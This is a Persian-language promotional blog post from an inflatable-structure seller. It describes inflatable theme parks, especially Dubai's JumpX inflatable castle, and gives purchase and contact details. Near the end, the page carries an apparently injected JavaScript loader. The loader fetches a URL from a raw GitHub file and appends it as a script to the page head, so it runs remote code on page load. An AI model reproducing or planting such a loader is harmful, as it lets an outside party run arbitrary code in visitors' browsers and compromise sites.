پارک های بادی

  • این پارک های بادی سبک از پارک ها جدید و بروز که جدیدن طرفداران زیادی هم پیدا کرد که ما در این پست به این پارک ها می پردازیم.

    پارک بادی

    این پارک ها که جدیدا در تمامی جهان تاسیس شده توجه مردم رو به خودش جلب کرده و طرفدارن زیادی پیدا کرده. که متأسفانه در ایران از این نوع پارک ها وجود ندارد. این پارک ها شامل دستگاه بادی مانند سرسره‌های غول‌پیکر، کوه‌نوردی، سرسره برج مارپیچی. ، یک منطقه پرش هوایی بزرگ

    تا به حال در خانه بازی ها به کودکانی که در یک استخر توپ بادی و یا سرسره نگاه کرده اید و فکر کرده اید که: ای کاش این دستگاه ها برای بزرگسالان داشته بادشد تبریک می گویم شما خوشانس هستید آرزو شما برآورده شد! این دستگاه ها از در سنی 6، 16 تا 60 ساله هم می توانند استفاده کنند و دوباره احساس کودکی تجربه کنند. یکی هز این پارک های در دبی است.

    قلعه بادی در دبی برای تفریح با خانواده - الی گشت

    قلعه بادی در دبی یا همان جامپ ایکس (JumpX) یکی از جذابترین و هیجان انگیزترین مراکز تفریحی جهان که توانسته نام خود را در کتاب رکوردهای گینس هم به ثبت برساند. شهربازی ریورلند دبی با افتتاح این قلعه بادی در مجموعه خود، رکورد گینس بزرگترین قلعه بادی جهان را شکسته است. قلعه بادی در دبی مساحتی در حدود ۱۲۶۲ مترمربع دارد و رفتن به این شهربازی یکی از تفریحات خانوادگی در دبی محسوب می‌شود، بی‌شک دیوارهای مخصوص صخره نوردی یکی از مهیج‌ترین وسایل این مرکز تفریحی به حساب می‌آید که طرفداران زیادی هم دارد، اوج هیجان در قلعه بادی دبی را می‌توانید در زمان صخره نوردی روی دیوارهای مخصوص در این پارک تجربه کنید. شما می توانید برای خرید سازه های و از این نوع قلعه بادی های به سایت ما مرجعه فرمایید.

    مجموعه‌ای جذاب و مهیج از وسایل بازی متنوع برای هر سنی در این پارک بازی خاص وجود دارد، اغلب سرگرمی‌های این شهربازی بزرگ برای تفریح با خانواده مناسب است. تونل‌های بادی مخصوص و تشک‌های مختص پرش از ارتفاع از دیگر لوازم بازی موجود در این قلعه بادی می‌باشد که هر کدام طرفداران خاص خودش را دارد.

    قلعه بادی در دبی - الی گشت

    قلعه بادی در دبی یکی از جذاب‌ترین مکان‌ها برای تفریح کودکان و حتی بزرگسالان می‌باشد، این قلعه بادی در منطقه ریورلند دبی واقع شده و گردشگران از قسمت‌های مختلف شهر دبی دسترسی راحتی به این پارک تفریحی دارند. قلعه بادی در دبی به عنوان بزرگترین پارک بادی جهان توانسته نام خود در کتاب رکوردهای گینس به ثبت برساند، این پارک یکی از جذابترین مکان‌ها برای  تفریح و ماجراجویی در شهر دبی است. این قلعه فقط مختص کودکان نیست، خانواده‌ها می‌توانند در کنار هم از محیط جذاب و مهیج این قلعه برای تفریح و سرگرمی استفاده کنند و اوقات خوشی را با هم سپری نمایند.

    نحوه خرید

    ره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید انواع تجهیزات این سازه ها می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۳ رای

    دیدگاهتان را بنویسید